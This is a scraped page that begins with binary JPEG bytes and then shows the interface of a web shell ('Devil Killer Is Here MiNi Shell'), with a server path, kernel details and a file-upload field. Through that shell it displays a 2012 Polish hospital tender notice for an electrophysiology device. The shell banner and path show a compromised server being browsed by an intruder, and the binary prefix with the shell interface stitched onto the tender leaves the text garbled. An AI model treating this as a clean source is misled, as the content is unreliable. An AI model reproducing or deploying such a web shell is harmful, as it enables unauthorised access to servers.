JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120807/289812-N-2012.html

<p class="kh_header"><b>Częstochowa: Zakup aparatu do elektrofizjologii dla potrzeb Oddziału Kardiologii</b><br>
<b>Numer ogłoszenia: 289812 - 2012; data zamieszczenia: 07.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Najświętszej Marii Panny , ul. Bialska 104/118, 42-200 Częstochowa, woj. śląskie, tel. 034 3673753, faks 034 3651756.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> -www.szpitalparkitka.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup aparatu do elektrofizjologii dla potrzeb Oddziału Kardiologii.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Przedmiotem zamówienia jest ,,Zakup aparatu do elektrofizjologii dla potrzeb Oddziału Kardiologii Wojewódzkiego Szpitala Specjalistycznego im. Najświętszej Maryi Panny                   w Częstochowie zwanego dalej ,,sprzętem w ilości określonej w Załączniku Nr 2 do SIWZ      oraz o parametrach technicznych określonych w Załączniku Nr 4 do SIWZ.     
2.	Oferowany sprzęt musi  być fabrycznie nowy wyprodukowany po 1 stycznia 2012 roku.
3.	Dostawa sprzętu obejmuje:  
1)	Dokonanie instalacji dostarczonego sprzętu u Zamawiającego.
2)	Przeprowadzenie szkolenia obsługi w zakresie racjonalnej eksploatacji dostarczonego sprzętu.
3)	Dostarczenie Zamawiającemu instrukcji obsługi i serwisowania w języku polskim, wraz               z kodami serwisowymi oferowanego urządzenia.
4)	Dostarczenie Zamawiającemu certyfikatów dla personelu technicznego do wykonywania podstawowych napraw i przeglądów dostarczonej aparatury.
5)	Założenie paszportów technicznych dla dostarczonych urządzeń i kart gwarancyjnych w języku polskim.
4.	Wykonawca na dostarczony sprzęt udzieli gwarancji zgodnej z tą jaka została określona                   w tabeli parametrów technicznych stanowiącej Załącznik Nr 4 do SIWZ, liczonej od daty protokolarnego  odbioru sprzętu  przez Zamawiającego. Udzielona gwarancja będzie obejmowała cały dostarczony i zainstalowany sprzęt medyczny przez Wykonawcę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.18.22.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania przedmiotowego warunku, ponieważ nie ma on zastosowania w niniejszym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  co najmniej dwie dostawy sprzętu medycznego dla kardiologii o wartości każdej z nich nie mniejszej niż 150.000,00 zł brutto.


UWAGA:
Jeżeli rozliczenie następowało w walucie innej niż PLN, Wykonawca zobowiązany jest dokonać przeliczenia tej kwoty na PLN, przyjmując jako podstawę średni kurs danej waluty opublikowany przez NBP [wg tabeli A kursów średnich walut obcych] w dniu opublikowania ogłoszenia  o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu                        w powyższym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu                        w powyższym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu                        w powyższym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">7. 	W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w SIWZ, Zamawiający wymaga dołączenia do oferty: 
1)	Oświadczenie, że oferowany asortyment posiada dokumenty wymagane przez polskie prawo, na  podstawie których może być wprowadzony do obrotu i stosowania                          w placówkach ochrony zdrowia w RP - treść oświadczenia znajduje się w druku oferty, który stanowi Załącznik Nr 1 do SIWZ.
2)	Oświadczenie, że oferowane urządzenie jest kompletne i będzie po zainstalowaniu gotowe do pracy bez żadnych dodatkowych zakupów - treść oświadczenia znajduje się           w druku oferty, który stanowi Załącznik Nr 1 do SIWZ.
3)	Dokumenty dopuszczające oferowany asortyment do obrotu i używania na terenie Rzeczpospolitej Polskiej: Deklarację Zgodności, Certyfikat CE. Dokument musi być              w języku polskim lub przetłumaczony na język polski. 
4)	Oryginalnego katalogu, folderu, instrukcji  w języku polskim z zakreśleniem danego parametru oraz wskazaniem  numeru strony oferty w tabeli parametrów technicznych, stanowiącej Załącznik Nr 4 i Nr 5 do SIWZ. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski

8.	Zamawiający wymaga także dołączenia do oferty: 
1) 	Wypełnionego druku ,,OFERTY, stanowiącego Załącznik Nr 1 do niniejszej specyfikacji, zawierający oświadczenie, że Wykonawca spełnia wszystkie warunki określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
2)	Wypełnionej tabeli zawierającej parametry techniczne przedmiotu zamówienia (wzór stanowi Załącznik Nr 4 do SIWZ).
3)	Wypełnionej tabeli zawierającej parametry oceniane przedmiotu zamówienia (wzór stanowi Załącznik Nr 5 do SIWZ).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W postępowaniu mogą wziąć udział  Wykonawcy, którzy spełniają warunki udziału                         w postępowaniu,  o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, tj. dotyczące:   
1) 	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek  ich posiadania. 
Zamawiający nie opisuje sposobu dokonywania oceny spełniania przedmiotowego warunku, ponieważ nie ma on zastosowania w niniejszym postępowaniu. 
2) 	Posiadania wiedzy i doświadczenia.
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  co najmniej dwie dostawy sprzętu medycznego dla kardiologii o wartości każdej z nich nie mniejszej niż 150.000,00 zł brutto.


UWAGA:
Jeżeli rozliczenie następowało w walucie innej niż PLN, Wykonawca zobowiązany jest dokonać przeliczenia tej kwoty na PLN, przyjmując jako podstawę średni kurs danej waluty opublikowany przez NBP [wg tabeli A kursów średnich walut obcych] w dniu opublikowania ogłoszenia  o niniejszym zamówieniu w Biuletynie Zamówień Publicznych. 
3) 	Dysponowania odpowiednim  potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu                        w powyższym zakresie.
	4)	Sytuacji ekonomicznej i finansowej.
Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu                         w powyższym zakresie.

2.	W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunek udziału                          w postępowaniu dotyczący braku podstaw do wykluczenia z postępowania                     o udzielenie zamówienia publicznego w okolicznościach,  o których mowa                w art. 24 ust. 1 ustawy. 

§ 6. 	WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU                W POSTĘPOWANI:   
1. 	W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w              art. 22 ust. 1 ustawy, do oferty należy załączyć:

1)	Wykaz wykonanych dostaw, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że te dostawy zostały wykonane należycie według wzoru na   Załącznika Nr 6 do SIWZ. 

2.	W celu wykazania spełniania warunku udziału w postępowaniu dotyczącego braku podstaw do wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 ustawy, należy złożyć następujące dokumenty w formie oryginału lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną, z zachowaniem sposobu reprezentacji:

1)	Oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych, według wzoru na Załączniku Nr 3 do SIWZ.
2)	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu                do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy. 
Przy czym osoby fizyczne w celu spełnienia ww. warunku zobowiązane są do przedstawienia wyłącznie oświadczenia o którym mowa w § 6 ust. 2 pkt. 1) niniejszej specyfikacji.  

3.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 6 ust. 2 pkt. 2 SIWZ, składa dokument lub dokumenty  wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:

a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości.

Dokumenty, o których mowa w lit. a) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Jeżeli w kraju zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu  zawodowego lub gospodarczego   odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione z odpowiednią datę wymaganą dla tych dokumentów.

Dokument ten winien być złożony w oryginale lub kopii poświadczonej za zgodność                    z oryginałem przez osobę (-y) uprawnioną (-e) do składania oświadczeń woli w imieniu Wykonawcy.

4. W przypadku składania oferty wspólnej przez kilku przedsiębiorców                            [tzw. konsorcjum] lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki  cywilnej musi złożyć dokumenty wymienione w § 6 ust. 2 SIWZ (lub w § 6 ust. 3 SIWZ - jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej). 
Pozostałe dokumenty będą traktowane jako wspólne Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.

Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu Cywilnego.

5.	Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych Wykonawca może polegać na  wiedzy           i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest  udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania  z nich przy wykonywaniu zamówienia. Ww. zobowiązanie musi zostać załączone do oferty przetargowej w oryginale.

6. 	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz                          w przypadku, gdy Wykonawca wykazując spełnianie warunków, o których mowa w § 5 ust. 1 pkt. 2) specyfikacji polega na zasobach innych podmiotów, kopie dokumentów potwierdzających spełnianie tych warunków, dotyczących odpowiednio wspólników konsorcjum lub innych podmiotów powinny być poświadczone za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dokumentów go dotyczących) lub przez pełnomocnika konsorcjum, jeżeli będzie miał do tej czynności upoważnienie, a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy                          w odniesieniu do dotyczących go dokumentów).  

7. 	W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w SIWZ, Zamawiający wymaga dołączenia do oferty: 
1)	Oświadczenie, że oferowany asortyment posiada dokumenty wymagane przez polskie prawo, na  podstawie których może być wprowadzony do obrotu i stosowania                          w placówkach ochrony zdrowia w RP - treść oświadczenia znajduje się w druku oferty, który stanowi Załącznik Nr 1 do SIWZ.
2)	Oświadczenie, że oferowane urządzenie jest kompletne i będzie po zainstalowaniu gotowe do pracy bez żadnych dodatkowych zakupów - treść oświadczenia znajduje się           w druku oferty, który stanowi Załącznik Nr 1 do SIWZ.
3)	Dokumenty dopuszczające oferowany asortyment do obrotu i używania na terenie Rzeczpospolitej Polskiej: Deklarację Zgodności, Certyfikat CE. Dokument musi być              w języku polskim lub przetłumaczony na język polski. 
4)	Oryginalnego katalogu, folderu, instrukcji  w języku polskim z zakreśleniem danego parametru oraz wskazaniem  numeru strony oferty w tabeli parametrów technicznych, stanowiącej Załącznik Nr 4 i Nr 5 do SIWZ. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski

8.	Zamawiający wymaga także dołączenia do oferty: 
1) 	Wypełnionego druku ,,OFERTY, stanowiącego Załącznik Nr 1 do niniejszej specyfikacji, zawierający oświadczenie, że Wykonawca spełnia wszystkie warunki określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
2)	Wypełnionej tabeli zawierającej parametry techniczne przedmiotu zamówienia (wzór stanowi Załącznik Nr 4 do SIWZ).
3)	Wypełnionej tabeli zawierającej parametry oceniane przedmiotu zamówienia (wzór stanowi Załącznik Nr 5 do SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Parametry techniczne - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: 1. 	Jeżeli w postępowaniu złożone zostaną co najmniej 3 oferty nie podlegające odrzuceniu po dokonaniu oceny złożonych ofert, w celu wyboru najkorzystniejszej oferty, przeprowadzona zostanie aukcja elektroniczna. W toku aukcji elektronicznej stosowane będzie jedynie kryterium ceny. 
2.	Sposób oceny ofert w toku aukcji elektronicznej będzie obejmował przeliczanie postąpień na punktową ocenę  oferty, z uwzględnieniem  punktacji otrzymanej przed otwarciem aukcji.              W toku aukcji punktacja będzie przeliczana do 8 miejsca po  przecinku. Oferta w toku aukcji jest składana w wartości brutto podobnie jak w fazie  przed aukcją. Wykonawca, który złoży najkorzystniejszą ofertę po zakończeniu aukcji zobowiązany jest przesłać Zamawiającemu ceny jednostkowe (ofertę lub formularz cenowy), jako skan w formacie PDF podpisany przez osobę  upoważnioną do reprezentowania Wykonawcy oraz w formacie xls, w terminie 2 dni roboczych od daty zakończenia aukcji na adres: szp@data.pl . Wskazane w ww. tabeli ceny jednostkowe nie mogą być wyższe od cen jednostkowych przedstawionych w złożonej przez Wykonawcę ofercie przed aukcją. 
3. 	Warunki przeprowadzania aukcji zostaną przekazane w zaproszeniu zgodnie z art. 91 b ustawy Prawo zamówień publicznych. 

4.	Wymagania dotyczące rejestracji i identyfikacji Wykonawców:
1) 	Wykonawcy, których oferty nie podlegają odrzuceniu zostaną dopuszczeni do aukcji                   i otrzymają od Zamawiającego wraz z zaproszeniem poufne identyfikatory, komplety login-hasło, umożliwiające im  zalogowanie do systemu aukcyjnego EPP (www.soldea.pl).
2)		Przed przystąpieniem do aukcji Wykonawcy przeprowadzają proces rejestracji.
3)		Dokonanie procesu rejestracji jest warunkiem koniecznym udziału w aukcji.
4)	Wykonawca ma możliwość przeprowadzenia rejestracji od momentu otrzymania wraz                              z zaproszeniem poufnego identyfikatora. W toku rejestracji Wykonawca testuje posiadany podpis elektroniczny.
5)	Zaproszenia do udziału w aukcji elektronicznej, zawierające, między innymi, poufne identyfikatory, zostaną przekazane Wykonawcom przez Zamawiającego: drogą  elektroniczną, na adres e-mail Wykonawcy, wskazany w ofercie (w oświadczeniu rejestracyjnym). 
6) 	Fakt otrzymania drogą elektroniczną zaproszeń Wykonawcy potwierdzą Zamawiającemu niezwłocznie faksem na numer: (34) 367-37-53 lub adresem e-mail: szp@data.pl. 

5. 	Wymagania techniczne urządzeń informatycznych użytych do udziału w aukcji elektronicznej, zapewniające stabilne współdziałanie z platformą EPP.
	a) 	komputer klasy PC, system operacyjny: Windows 2000,XP,VISTA,7,
	b) 	stabilny dostęp do internetu bez pośrednictwa serwera Proxy,
	c) 	przeglądarka internetowa: Internet Explorer 5.5 lub wyższy, FireFox, Google Chrome,
	d)	zainstalowany program Java (bezpłatny, 
	e)	bezpieczny podpis elektroniczny weryfikowany ważnym kwalifikowanym certyfikatem,
	f)	wszelkie aktualne i szczegółowe informacje dotyczące ww. warunków Wykonawca znajdzie na stronie www.soldea.pl w dziale ,,Platforma przetargowa oraz w  instrukcjach postępowania udostępnianych wraz z zaproszeniem do elektronicznego składania ofert. 

6.	UWAGA: Dla Wykonawców nie posiadających bezpiecznego podpisu elektronicznego.

POSIADANIE PRZEZ WYKONAWCĘ BEZPIECZNEGO PODPISU ELEKTRONICZNEGO JEST WARUNKIEM KONIECZNYM UDZIAŁU W AUKCJI. 
Czas potrzebny do nabycia bezpiecznego podpisu elektronicznego waha się w granicach 3-5 dni. 

7. 	Informacji i pomocy w zdobyciu wymaganego podpisu może udzielić Operator, który będzie administrował aukcją.

